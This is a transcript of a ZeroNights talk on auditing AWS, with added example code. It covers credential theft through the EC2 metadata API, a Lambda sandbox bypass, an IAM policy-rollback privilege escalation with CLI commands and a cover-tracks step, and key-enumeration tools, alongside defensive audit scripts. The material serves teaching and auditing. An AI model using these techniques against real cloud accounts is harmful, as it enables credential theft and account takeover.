Doing AWS Zoo Audit - ZeroNights

Transcript of Doing AWS Zoo Audit - ZeroNights (67 pages)

Page 1:

DOING AWS ZOO AUDIT

Denis Rybin @_ttffdd_

Page 2:

WHY?

Page 3:

Why?

• AWS has small coverage in the Russian IS community

• The most frequent question is, “I knock on the metadata API, but can’t understand anything there.”

• False confidence that AWS is vulnerable to nothing but public S3 buckets and SSRF to the metadata API.

• Curiosity

Page 4:

What?

• 30-45 min. of mish-mash

• Level: “introduction and selected aspects”

The talk DOES cover:

• AWS for 5 minutes or so

• AWS for a bughunter

• AWS for an auditor

• Helpful tips and tricks

Page 5:

What?

The talk DOESN’T cover:

• AWS EKS

• Google Compute Engine

• Microsoft Azure

• Anything interesting

Page 6:

WHAT IS AWS?

A bunch of services

Page 7:

Simple and intuitive

EC2, you’ve surely heard about it:

• A ready-made virtual server

• Equipped with the instance metadata API

• May be furnished with a user data script

• A part of the AWS ecosystem

• Connected to a VPC

Page 8:

Two words about VPC

VPC is the key AWS network unit:

• Subnets / IP ranges

• Subnets and gateways

• Security Groups

AWS VPC

Page 9:

Simple and intuitive

Metadata API (the root lists the available API versions):

[ec2-user ~]$ curl http://169.254.169.254/
1.0
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
latest

Page 10:

Simple and intuitive

User data and the sensitive part of the metadata:

• http://169.254.169.254/latest/user-data

• http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

The second URL returns the temporary credentials (AccessKeyId, SecretAccessKey, Token, Expiration) of the instance profile role. The role name to put in place of [ROLE NAME] is listed at http://169.254.169.254/latest/meta-data/iam/security-credentials/ itself.

Page 11:

Fun fact about the metadata API

Google Cloud

• Header "Metadata-Flavor: Google" required

Azure

• Header "Metadata: true" required

AWS

• No header required

(This describes IMDSv1, the only version at the time of the talk. IMDSv2, released in November 2019, requires a session token obtained with a PUT request and sent in the X-aws-ec2-metadata-token header; instances that still allow IMDSv1 remain reachable with a plain GET.)

Page 12:

Dirty fix

https://github.com/stefansundin/ec2-metadata-filter

The program blocks any request with a User-Agent that does not start with one of the following prefixes:

aws-chalice/
aws-cli/
aws-sdk-
Boto3/
Botocore/
Cloud-Init/

Page 13:

Dirty fix

In addition to whitelisting User-Agent prefixes, the program also allows requests that send the header Metadata-Flavor: Amazon.

Page 14:

Dirty fix

Like GCE, the program blocks requests containing an X-Forwarded-For header.

It is a mitigation for the blind-SSRF case only: anything that can choose its own headers (code execution on the instance, or an SSRF where the attacker controls request headers) walks straight through the filter.

Page 15:

COOOOOL STORY TIME

A story by @ninjazeroone about FunctionShield

AWS Lambda

Page 17:

COOOOOL STORY TIME

Context: there is a Python sandbox with code execution. The code in it is executed for data processing, big data, etc.

We post Python code in a website form → the code is parsed and run on AWS Lambda.

Page 18:

COOOOOL STORY TIME

This is where the library jumps into action. It serves 4 major tasks:

1. Block all TCP connections (UDP isn’t blocked)

2. Restrict all child processes

3. Forbid read/write to /tmp

4. Forbid reading the handler script, which contains the bulk of the code

Page 20:

COOOOOL STORY TIME

So everything except read/write to /tmp was forbidden for us.


Page 24:

COOOOOL STORY TIME

The more the merrier:

• The mechanism that blocks /tmp is a syscall blacklist

• So let’s look for something that is not on the blacklist

Page 25:

COOOOOL STORY TIME

And we managed to find it:

• read and write are forbidden

• rename is NOT
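To make the gap concrete, here is an added toy model, not FunctionShield’s code (which hooks syscalls inside the Lambda runtime) and not @ninjazeroone’s actual steps (the slides do not give them): a sandbox that refuses read and write on a protected directory by naming those operations, but never thought of rename, next to the allow-list version of the same policy. The class names, directory layout and the sample secret are constructed for the demo.

```python
import os
import tempfile


class PolicyViolation(PermissionError):
    """Raised when the sandbox refuses a file operation."""


class DenyListSandbox:
    """Toy deny-list policy (hypothetical, not FunctionShield's implementation):
    read/write on the protected directory are refused; rename was never listed."""

    denied_ops = {"read", "write"}

    def __init__(self, protected_dir):
        self.protected = os.path.realpath(protected_dir)

    def _inside(self, path):
        real = os.path.realpath(path)
        return real == self.protected or real.startswith(self.protected + os.sep)

    def _check(self, op, *paths):
        if op in self.denied_ops and any(self._inside(p) for p in paths):
            raise PolicyViolation(f"{op} denied on {paths}")

    def read(self, path):
        self._check("read", path)
        with open(path, "rb") as f:
            return f.read()

    def write(self, path, data):
        self._check("write", path)
        with open(path, "wb") as f:
            f.write(data)

    def rename(self, src, dst):
        self._check("rename", src, dst)  # passes: "rename" is not on the deny list
        os.rename(src, dst)


class AllowListSandbox(DenyListSandbox):
    """Same operations, but anything touching the protected directory is refused
    unless explicitly allowed, so rename is caught without anyone naming it."""

    allowed_ops = set()

    def _check(self, op, *paths):
        if op not in self.allowed_ops and any(self._inside(p) for p in paths):
            raise PolicyViolation(f"{op} denied on {paths}")


def run_scenario(sandbox_cls):
    """Plant a secret in the protected dir, try a direct read, then the rename trick.
    Returns (direct_read_blocked, bytes_obtained_via_rename_or_None)."""
    with tempfile.TemporaryDirectory() as root:
        protected = os.path.join(root, "tmp")
        outside = os.path.join(root, "elsewhere")
        os.makedirs(protected)
        os.makedirs(outside)
        secret_path = os.path.join(protected, "secret.txt")
        with open(secret_path, "wb") as f:  # constructed sample secret
            f.write(b"db_password=constructed-sample-secret")

        sb = sandbox_cls(protected)
        try:
            sb.read(secret_path)
            direct_blocked = False
        except PolicyViolation:
            direct_blocked = True

        moved = os.path.join(outside, "secret.txt")
        try:
            sb.rename(secret_path, moved)  # the operation missing from the deny list
            leaked = sb.read(moved)        # now outside the protected tree, so read is fine
        except PolicyViolation:
            leaked = None
        return direct_blocked, leaked


if __name__ == "__main__":
    print("deny list :", run_scenario(DenyListSandbox))
    print("allow list:", run_scenario(AllowListSandbox))
```

The point of the pair is not the particular missing call: a deny list has to enumerate every path to the protected resource (rename, link, openat variants, and so on), while an allow list only has to enumerate what the workload legitimately needs.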

Page 26:

WIN-WIN-WIN

BACK TO AWS…

Page 27:

Simple and intuitive

Quite often, user data is a script executed when an instance is launched.

For example:

#!/bin/bash
yum update -y
amazon-linux-extras install -y lamp-mariadb10.2-php7.2 php7.2
yum install -y httpd mariadb-server
systemctl start httpd
systemctl enable httpd
usermod -a -G apache ec2-user
chown -R ec2-user:apache /var/www
chmod 2775 /var/www
find /var/www -type d -exec chmod 2775 {} \;
find /var/www -type f -exec chmod 0664 {} \;
echo "<?php phpinfo(); ?>" > /var/www/html/phpinfo.php

User data is stored unencrypted and is served to any process on the instance that can reach the metadata API, so passwords, keys and bootstrap tokens placed in such a script are one SSRF or one shell away from an attacker.
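The two things worth pulling from the metadata API (the sensitive paths on Page 10 and the user data script above) are the same two things the “I knock on the metadata API, but can’t understand anything” question is about. Here is an added Python helper, not code from the talk, that walks the IMDS tree, extracts the role credentials and user data, and flags likely secrets. The live fetch tries IMDSv2 (session token via PUT) first and falls back to the header-less IMDSv1 GET the slides describe; the fetch function is injected, so the block runs offline against a constructed fake IMDS tree whose values (instance ID, role name, keys) are made up.

```python
import json
import re
import urllib.error
import urllib.request

IMDS = "http://169.254.169.254/"
CREDS_PREFIX = "latest/meta-data/iam/security-credentials/"
SECRET_RE = re.compile(r"(?i)(password|passwd|secret|token|api[_-]?key|AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})")


def imds_request(path, method="GET", headers=None, timeout=2):
    """One request against the real IMDS; None on any HTTP error or timeout."""
    req = urllib.request.Request(IMDS + path, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None


def make_live_fetch():
    """fetch(path) bound to a live instance: IMDSv2 token first, plain IMDSv1 GET if that fails."""
    token = imds_request("latest/api/token", method="PUT",
                         headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    headers = {"X-aws-ec2-metadata-token": token} if token else {}
    return lambda path: imds_request(path, headers=headers)


def walk(fetch, path="latest/meta-data/", depth=8):
    """Recursively list the IMDS tree; a trailing '/' marks a directory. Returns {leaf_path: body}."""
    body = fetch(path)
    if body is None or depth < 0:
        return {}
    if not path.endswith("/"):
        return {path: body}
    leaves = {}
    for entry in body.splitlines():
        entry = entry.strip()
        if entry:
            leaves.update(walk(fetch, path + entry, depth - 1))
    return leaves


def triage(fetch):
    """Collect what an attacker with SSRF or RCE on the instance actually wants."""
    tree = walk(fetch)
    roles = {}
    for path, body in tree.items():
        if path.startswith(CREDS_PREFIX) and len(path) > len(CREDS_PREFIX):
            creds = json.loads(body)
            key_id = str(creds.get("AccessKeyId", ""))
            roles[path[len(CREDS_PREFIX):]] = {
                "AccessKeyId": key_id,
                "Expiration": creds.get("Expiration"),
                "is_temporary": key_id.startswith("ASIA"),  # STS credentials, need the Token too
            }
    user_data = fetch("latest/user-data") or ""
    hits = [line.strip() for line in user_data.splitlines() if SECRET_RE.search(line)]
    return {
        "instance_id": tree.get("latest/meta-data/instance-id"),
        "roles": roles,
        "user_data_lines": len(user_data.splitlines()),
        "user_data_hits": hits,
    }


# Constructed fake IMDS tree so the block runs offline; every value here is made up.
FAKE_IMDS = {
    "latest/meta-data/": "ami-id\ninstance-id\niam/\nhostname\n",
    "latest/meta-data/ami-id": "ami-0123456789abcdef0",
    "latest/meta-data/instance-id": "i-0fake0000000000001",
    "latest/meta-data/hostname": "ip-10-0-1-23.ec2.internal",
    "latest/meta-data/iam/": "info\nsecurity-credentials/\n",
    "latest/meta-data/iam/info": json.dumps({"InstanceProfileArn": "arn:aws:iam::123456789012:instance-profile/web-app"}),
    "latest/meta-data/iam/security-credentials/": "web-app-role\n",
    "latest/meta-data/iam/security-credentials/web-app-role": json.dumps({
        "Code": "Success", "Type": "AWS-HMAC", "AccessKeyId": "ASIAFAKEFAKEFAKEFAKE",
        "SecretAccessKey": "fake/secret", "Token": "fake-session-token",
        "Expiration": "2019-11-13T18:00:00Z"}),
    "latest/user-data": "#!/bin/bash\nyum install -y httpd\nexport DB_PASSWORD=constructed-example\nsystemctl start httpd\n",
}


def fake_fetch(path):
    return FAKE_IMDS.get(path)


if __name__ == "__main__":
    print(json.dumps(triage(fake_fetch), indent=2))   # offline demo
    # on a real instance: print(json.dumps(triage(make_live_fetch()), indent=2))
```

Role credentials from IMDS are STS credentials (key ID starting with ASIA), so they only work together with the Token and expire; to reuse them from your own machine, export all three as AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN.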

Page 28:

Pretty important

AWS Security Credentials

Access keys consist of two parts:

• an access key ID (for example, AKIAIOSFODNN7EXAMPLE)

• a secret access key (for example, wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY)

Temporary credentials issued by STS (including the role credentials served by the metadata API) come as a triple: the key ID starts with ASIA instead of AKIA, and a session token has to be sent along with every call.

AWS IAM

Page 29:

Pretty important

The key to what?

There are 2 options to find out:

• Ask AWS directly (e.g. sts:GetCallerIdentity) and get burned: the call lands in the key owner’s CloudTrail

• Bruteforce: try a catalogue of API calls and see which ones are allowed

Page 30:

Pretty important

The key to what? There are 2 options to find out:

• https://github.com/elitest/RedDolphin/blob/master/checkAWSKey.py

• https://github.com/andresriancho/enumerate-iam

Page 31:

Pretty important

https://github.com/elitest/RedDolphin/blob/master/checkAWSKey.py - for those who prefer asking

Page 32:

Pretty important

https://github.com/andresriancho/enumerate-iam - time-consuming (and every failed call is also a CloudTrail event, just many more of them)

Page 34:

AWS 101

ARN default format:

• arn:partition:service:region:account-id:resource-id

• arn:partition:service:region:account-id:resource-type/resource-id

• arn:partition:service:region:account-id:resource-type:resource-id

Example:

• arn:aws:iam::123456789012:user/Development/product_1234/*

(IAM is a global service, so its ARNs leave the region field empty: hence the double colon before the account ID.)

AWS core

Page 35:

AWS 101

Try guessing what the config does? Get the prize!

Page 37:

AWS 101

Dungeons and Dragons

Users and policies

Page 38:

AWS 101

Users:

• The AWS account root user

• IAM users

• IAM groups

• IAM roles

Page 39:

AWS 101

Policies:

• Identity-based policies: managed policies and inline policies

• Resource-based policies

Page 40:

Escalation case

Escalation case from CloudGoat

Here is a simple case - iam_privesc_by_rollback

CloudGoat

Pages 41-46:

Route Walkthrough - IAM User "Raynor"

1. Starting as the IAM user "Raynor," the attacker has only a few limited - seemingly harmless - privileges available to them.

2. The attacker analyzes Raynor's privileges and notices the SetDefaultPolicyVersion permission - allowing access to 4 other versions of the policy via setting an old version as the default.

3. After reviewing the old policy versions, the attacker finds that one version in particular offers a full set of admin rights.

4. Attacker restores the full-admin policy version, gaining full admin privileges and the ability to carry out any malicious actions they wish.

5. As a final step, the attacker may choose to revert Raynor's policy version back to the original one, thereby concealing their actions and the true capabilities of the IAM user.

Page 47:

AWS-CLI Walkthrough - IAM User «Raynor»

1. aws configure --profile raynor

2. aws iam list-attached-user-policies --user-name raynor --profile raynor

3. aws iam list-policy-versions --policy-arn <generatedARN>/cg-raynor-policy --profile raynor

4. aws iam get-policy-version --policy-arn <generatedARN>/cg-raynor-policy --version-id <versionID> --profile raynor

5. aws iam set-default-policy-version --policy-arn <generatedARN>/cg-raynor-policy --version-id <versionID> --profile raynor

(Step 4 is repeated for each version listed in step 3; step 5 is then run with the version that carries the admin statement. Profile names are case-sensitive, so the profile created in step 1 must be spelled the same way in every later command.)

CloudGoat

AWS-CLI in action
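The same scenario from the auditor’s chair, as an added Python example (not part of the talk and not CloudGoat’s code): given a customer-managed policy’s versions in the shape iam:ListPolicyVersions / iam:GetPolicyVersion return them, it reports whether the default version lets the principal roll itself back (iam:SetDefaultPolicyVersion) and which non-default versions are worth rolling back to. The analysis runs on a constructed set of versions modelled on the cg-raynor-policy story; the live collector at the end imports boto3 only when called and needs iam:ListPolicyVersions and iam:GetPolicyVersion. The DANGEROUS list is my own short selection, not an exhaustive one.

```python
import json


def _as_list(value):
    """IAM policy fields may be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _wild(pattern, value):
    """IAM-style action match: '*' matches anything, 'svc:Get*' matches by prefix, else exact."""
    if pattern == "*":
        return True
    if pattern.endswith("*"):
        return value.lower().startswith(pattern[:-1].lower())
    return pattern.lower() == value.lower()


def allowed_resources(document, action):
    """Resources on which the document has an Allow statement covering `action`.
    Deny statements and conditions are not evaluated: this spots over-permissive
    versions, it is not an IAM simulator."""
    found = []
    for stmt in _as_list(document.get("Statement")):
        if stmt.get("Effect") == "Allow" and any(_wild(a, action) for a in _as_list(stmt.get("Action"))):
            found.extend(_as_list(stmt.get("Resource")))
    return found


# Actions whose presence in an old version makes a rollback worth it for an attacker (own selection).
DANGEROUS = ("iam:*", "iam:CreateAccessKey", "iam:AttachUserPolicy", "iam:PutUserPolicy",
             "sts:AssumeRole", "lambda:UpdateFunctionCode", "ec2:RunInstances")


def audit_versions(policy_arn, versions):
    """versions: list of {VersionId, IsDefaultVersion, Document}. Returns the rollback exposure."""
    default = next(v for v in versions if v["IsDefaultVersion"])
    report = {
        "PolicyArn": policy_arn,
        "DefaultVersion": default["VersionId"],
        "DefaultCanRollback": bool(allowed_resources(default["Document"], "iam:SetDefaultPolicyVersion")),
        "RiskyVersions": [],
    }
    for v in versions:
        if v["IsDefaultVersion"]:
            continue
        hits = {a: allowed_resources(v["Document"], a) for a in ("*",) + DANGEROUS}
        hits = {a: r for a, r in hits.items() if r}
        if hits:
            report["RiskyVersions"].append({"VersionId": v["VersionId"], "Grants": hits})
    return report


def collect_versions(policy_arn, session=None):
    """Live collector: every version's document for one policy (boto3 imported lazily)."""
    import boto3
    iam = (session or boto3.Session()).client("iam")
    out = []
    for v in iam.list_policy_versions(PolicyArn=policy_arn)["Versions"]:
        doc = iam.get_policy_version(PolicyArn=policy_arn, VersionId=v["VersionId"])["PolicyVersion"]["Document"]
        out.append({"VersionId": v["VersionId"], "IsDefaultVersion": v["IsDefaultVersion"], "Document": doc})
    return out


# Constructed sample: harmless-looking default, full admin hiding in an old version.
SAMPLE_ARN = "arn:aws:iam::123456789012:policy/cg-raynor-policy"
SAMPLE_VERSIONS = [
    {"VersionId": "v1", "IsDefaultVersion": True, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*", "iam:SetDefaultPolicyVersion"], "Resource": "*"}]}},
    {"VersionId": "v2", "IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "s3:ListAllMyBuckets", "Resource": "*"}]}},
    {"VersionId": "v3", "IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    {"VersionId": "v4", "IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["iam:CreateAccessKey"], "Resource": "arn:aws:iam::123456789012:user/*"}]}},
]

if __name__ == "__main__":
    print(json.dumps(audit_versions(SAMPLE_ARN, SAMPLE_VERSIONS), indent=2))
```

The remediation that follows from the report is the same in both directions: delete the stale versions (iam:DeletePolicyVersion) so there is nothing to roll back to, and treat iam:SetDefaultPolicyVersion as the admin-equivalent permission it is.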

Page 48:

Pretty important

Escalation will be addressed later

But here are a couple of helpful links!

• https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation - 28 (!!!) techniques

• https://github.com/RhinoSecurityLabs/pacu - the Metasploit of the AWS world

AWS IAM

Page 49:

Best first step

ScoutSuite

Page 50:

Details

Page 51:

MORE details

Page 52:

What do you need for an audit?

Permissions

The following AWS managed policies can be attached to the principal used to run Scout in order to grant the necessary permissions:

• ReadOnlyAccess

• SecurityAudit

You will also find a custom policy to run Scout with minimal privileges in the ScoutSuite repository.

Note that ReadOnlyAccess is far broader than SecurityAudit: it includes s3:Get*, i.e. reading object contents, which a configuration audit does not need. Prefer SecurityAudit or the minimal custom policy for the audit principal.

Page 53:

AWS Bloodhound

Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.

Lyft cartography

Page 55:

OK, LAST PART

TWO GREAT CASES

Page 56:

COGNITO case

The service allows for assigning limited rights to users in your AWS account.

The purpose of the service:

• Obtain an identity ID

• Hand out AWS credentials

The service is used by mobile apps and websites.

An identity pool hands out temporary credentials for an IAM role. If the pool allows unauthenticated identities, anyone holding the pool ID (which ships inside the app or web page) can obtain the unauthenticated role’s credentials, so that role’s policy is exactly as dangerous as the permissions it grants.

AWS Cognito

Page 57:

COGNITO case

Q: Could the obtained rights be unsafe?

A: Sure :)

Page 58:

COGNITO case

Original research:

internet-scale-analysis-of-aws-cognito-security

Page 59:

EBS case

AWS EBS

Amazon Elastic Block Store (EBS) is a simple-to-use, high-performance block storage service designed to be used together with Amazon Elastic Compute Cloud (EC2).

Page 60:

EBS case

An EBS snapshot can be:

• Public/Private

• Encrypted/Non-encrypted

Sharing happens at the snapshot level: a snapshot’s createVolumePermission can be granted to specific account IDs or to the group "all" (public). Encrypted snapshots cannot be made public, so every public snapshot is also an unencrypted one.

Page 61:

EBS case

Q: Can public non-encrypted disks contain secrets?

A: Sure they can :)

Page 62:

EBS case

Original research:

Finding Secrets In Publicly Exposed EBS Volumes - Ben Morris
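An added check for the defender’s side of this case (example code, not the talk’s and not Ben Morris’s tooling): given the shapes returned by ec2:DescribeSnapshots and ec2:DescribeSnapshotAttribute(createVolumePermission), it lists every snapshot in your account that is public or shared with other accounts and marks the unencrypted ones, which is the combination the question on Page 61 is about. The analysis runs on constructed sample data inline; the live collector at the end imports boto3 lazily and needs ec2:DescribeSnapshots and ec2:DescribeSnapshotAttribute. The severity labels are my own convention.

```python
def classify_snapshot(snapshot, create_volume_permissions):
    """snapshot: one entry of DescribeSnapshots()['Snapshots'];
    create_volume_permissions: DescribeSnapshotAttribute(Attribute='createVolumePermission')
    ['CreateVolumePermissions'] for that snapshot. Returns None when private, else a finding."""
    public = any(p.get("Group") == "all" for p in create_volume_permissions)
    shared_with = sorted(p["UserId"] for p in create_volume_permissions if "UserId" in p)
    if not public and not shared_with:
        return None
    encrypted = bool(snapshot.get("Encrypted"))
    if public and not encrypted:
        severity = "high"      # anyone can create a volume from it and read the filesystem
    elif public:
        severity = "medium"    # not reachable in practice: encrypted snapshots cannot be public
    else:
        severity = "low" if encrypted else "medium"   # shared to named accounts only
    return {"SnapshotId": snapshot["SnapshotId"], "OwnerId": snapshot.get("OwnerId"),
            "Public": public, "SharedWith": shared_with, "Encrypted": encrypted,
            "Description": snapshot.get("Description", ""), "Severity": severity}


def audit_snapshots(snapshots, permissions_by_id):
    """Classify a DescribeSnapshots result; findings sorted high to low, then by ID."""
    order = {"high": 0, "medium": 1, "low": 2}
    findings = [classify_snapshot(s, permissions_by_id.get(s["SnapshotId"], [])) for s in snapshots]
    return sorted((f for f in findings if f), key=lambda f: (order[f["Severity"]], f["SnapshotId"]))


def collect_own_snapshots(session=None, region="us-east-1"):
    """Live collector for one account and region (boto3 imported lazily)."""
    import boto3
    ec2 = (session or boto3.Session()).client("ec2", region_name=region)
    snapshots, perms = [], {}
    for page in ec2.get_paginator("describe_snapshots").paginate(OwnerIds=["self"]):
        for s in page["Snapshots"]:
            snapshots.append(s)
            perms[s["SnapshotId"]] = ec2.describe_snapshot_attribute(
                SnapshotId=s["SnapshotId"], Attribute="createVolumePermission")["CreateVolumePermissions"]
    return snapshots, perms


# Constructed sample data in the DescribeSnapshots / DescribeSnapshotAttribute shapes.
SAMPLE_SNAPSHOTS = [
    {"SnapshotId": "snap-0aaa", "OwnerId": "123456789012", "Encrypted": False, "Description": "web-prod root"},
    {"SnapshotId": "snap-0bbb", "OwnerId": "123456789012", "Encrypted": True, "Description": "db backup"},
    {"SnapshotId": "snap-0ccc", "OwnerId": "123456789012", "Encrypted": False, "Description": "golden image"},
    {"SnapshotId": "snap-0ddd", "OwnerId": "123456789012", "Encrypted": False, "Description": "private"},
]
SAMPLE_PERMISSIONS = {
    "snap-0aaa": [{"Group": "all"}],
    "snap-0bbb": [{"UserId": "210987654321"}],
    "snap-0ccc": [{"UserId": "210987654321"}, {"UserId": "111122223333"}],
    "snap-0ddd": [],
}

if __name__ == "__main__":
    for f in audit_snapshots(SAMPLE_SNAPSHOTS, SAMPLE_PERMISSIONS):
        who = "public" if f["Public"] else "shared:" + ",".join(f["SharedWith"])
        print(f["Severity"], f["SnapshotId"], who, "encrypted" if f["Encrypted"] else "unencrypted", f["Description"])
```

The attacker’s view of the same data is one call: ec2:DescribeSnapshots with RestorableByUserIds=["all"] enumerates every public snapshot in a region, which is the starting point of the research linked above; the auditor’s job is to make sure none of them carry your account ID.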

Page 63:

I don’t want to :( Oh, come on:

• http://flaws.cloud/

• https://github.com/EdOverflow/can-i-take-over-xyz

• Hundreds of BB cases, thousands of articles on the same topic

AWS S3

Page 64:

For defense

asecure.cloud

Page 65:

RESOURCES

• AWS EC2 Security Strategy Guide
https://asecure.cloud/g/strategy_ec2_security/

• API Keys, Now What? Taking the Pen Test Into the Amazon Cloud - Jim Shaver
https://www.youtube.com/watch?v=vV7xN2JQNOU

• Finding Secrets In Publicly Exposed EBS Volumes - Ben Morris
https://www.youtube.com/watch?v=-LGR63yCTts

• CloudGoat
https://github.com/RhinoSecurityLabs/cloudgoat

• Rhino Security Labs blog
https://rhinosecuritylabs.com/blog/

• Andres Riancho’s blog
https://andresriancho.com/blog

Page 66:

RESOURCES

A channel where I plan to post interesting things about the security of AWS, other clouds and maybe k8s:

https://t.me/cloud_sec

Page 67:

THANKS FOR YOUR ATTENTION

@_TTFFDD_